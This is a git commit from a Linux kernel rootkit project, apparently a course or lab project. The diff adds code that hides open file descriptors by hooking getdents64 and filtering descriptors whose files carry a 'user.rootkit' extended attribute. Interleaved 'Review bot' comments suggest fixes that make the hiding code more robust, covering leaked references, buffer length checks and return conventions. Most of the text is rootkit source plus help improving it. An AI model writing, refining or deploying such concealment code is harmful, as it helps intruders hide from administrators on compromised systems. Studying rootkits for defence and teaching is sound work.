linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit e0f2dbfbc2f175ed552c6d16fbe802a8a09c365a
parent 5a8444a83fc6d1df17e42a9d39ef7d208cc6f3c2
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat,  5 Dec 2020 23:01:25 +0100

Add fd stuff

Diffstat:
Msrc/hideopen.c | 39+++++++++++++++++++++++++++++++++++----
Msrc/hideopen.h | 4++++
Msrc/hook.c | 4++--
3 files changed, 41 insertions(+), 6 deletions(-)

diff --git a/src/hideopen.c b/src/hideopen.c
@@ -1,5 +1,9 @@
 #include <linux/slab.h>
 #include <linux/fd.h>
+#include <linux/pid.h>
+#include <linux/sched.h>
+#include <linux/fdtable.h>
+#include <linux/xattr.h>
 #include "common.h"
 #include "hook.h"
@@ -16,7 +20,6 @@ fd_list_t hidden_fds = {
 fd_list_t_ptr hidden_fds_tail = &hidden_fds;
-//Returns pid on success, -1 on failure
 pid_t
 may_fd(struct file *dirfile)
 {
@@ -40,7 +43,9 @@ may_fd(struct file *dirfile)
 	**/
 	int i = 0;
-	while((sub = strsep(&cur, dir_sep))) {
+	while(sub = (strsep(&cur, dir_sep))) {
+		DEBUG_INFO("sub is %s\n", sub);
+
 		switch(i++) {
 		case 1:
 			if(strcmp(sub, "proc"))
@@ -64,13 +69,39 @@ may_fd(struct file *dirfile)
 leave:
 	kfree(buf);
-	return -1;
+	return 0;
+}
+
+int
+fd_callback(const void *ptr, struct file *f, unsigned fd)
+{
+	struct inode *inode = f->f_inode;
+	char buf[512];
+
+	if(!inode_permission(inode, MAY_READ)) {
+		ssize_t len = vfs_getxattr(f->f_path.dentry, G7_XATTR_NAME, buf, BUFLEN);
+
+		if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL)))
+			add_fd_to_list(&hidden_fds, (int) fd);
+	}
+
+	return 0;
 }
 void
 fill_fds(pid_t pid)
 {
-
+	struct pid *spid;
+	struct task_struct *task;
+	struct files_struct *fs;
+
+	if (!(spid = find_get_pid(pid)) || !(task = pid_task(spid, PIDTYPE_PID)))
+		return;
+
+	if(!(fs = get_files_struct(task)))
+		return;
+
+	iterate_fd(fs, 0, (void *)fd_callback, NULL);
 }
 void
diff --git a/src/hideopen.h b/src/hideopen.h
@@ -4,6 +4,10 @@
 #include <linux/types.h>
 #define FD_FROM_NAME(name) ((int)simple_strtol((name), NULL, 10))
+#define G7_XATTR_NAME "user.rootkit"
+#define G7_XATTR_VAL "rootkit"
+
+#define BUFLEN 512
 typedef struct fd_list *fd_list_t_ptr;
 typedef struct fd_list {
diff --git a/src/hook.c b/src/hook.c
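Review bot: The rewritten loop header `while(sub = (strsep(&cur, dir_sep)))` drops the outer double parentheses that marked the assignment as intentional, so `-Wall` (on by default in the kernel build) will warn "suggest parentheses around assignment used as truth value" and a reader may take it for a mistyped `==`. The old form was the correct one; restore it as `while((sub = strsep(&cur, dir_sep))) {`. The body of may_fd starts and ends outside this hunk.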
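Review bot: fill_fds takes references it never drops: `find_get_pid` returns a counted `struct pid` and `get_files_struct` a counted `files_struct`, but neither `put_pid(spid)` nor `put_files_struct(fs)` is called on any path, so every call leaks both references. Add `put_files_struct(fs);` after the `iterate_fd` call and `put_pid(spid);` before each return once `find_get_pid` has succeeded. In fd_callback, `char buf[512]` and the `BUFLEN` passed to vfs_getxattr spell the same size twice, so declare it `char buf[BUFLEN];`, and because vfs_getxattr does not NUL-terminate the value it copies, require `len >= (ssize_t)strlen(G7_XATTR_VAL)` rather than `len > 0` before `strncmp` reads that many bytes of the buffer. The `(void *)` cast on fd_callback only hides any mismatch with the callback type iterate_fd expects; pass `fd_callback` unchanged so the compiler checks it.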
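Review bot: `BUFLEN` is a generic, unprefixed name exported from a header next to prefixed macros such as `G7_XATTR_NAME`; it is likely to collide with a same-named macro in another header and gives no hint that it sizes the xattr value buffer in hideopen.c. Rename it to match its siblings, e.g. `#define G7_XATTR_BUFLEN 512`, and update the vfs_getxattr call in hideopen.c accordingly.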
@@ -233,9 +233,9 @@ g7_getdents64(const struct pt_regs *pt_regs)
 		}
 	}
-	if(rootkit.hiding_open_files && ((fd_pid = may_fd(dirfile)) != -1)) {
+	if(rootkit.hiding_open_files && (fd_pid = may_fd(dirfile))) {
 		is_fd = 1;
-		add_fd_to_list(&hidden_fds, 0);
+		fill_fds(fd_pid);
 	}
 	for (offset = 0; offset < ret;) {
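Review bot: The new condition `(fd_pid = may_fd(dirfile))` relies on may_fd returning 0 on failure, a convention this commit introduces while also deleting the only comment that stated the function's return contract (`//Returns pid on success, -1 on failure`, in the hideopen.c hunk). Document the new convention on the may_fd definition, e.g. `/* Returns the pid parsed from the path, or 0 if none could be derived */`; the exact success condition is only partly visible here (the `"proc"` path-component check), so word it to match the full body. The enclosing g7_getdents64 starts and ends outside this hunk.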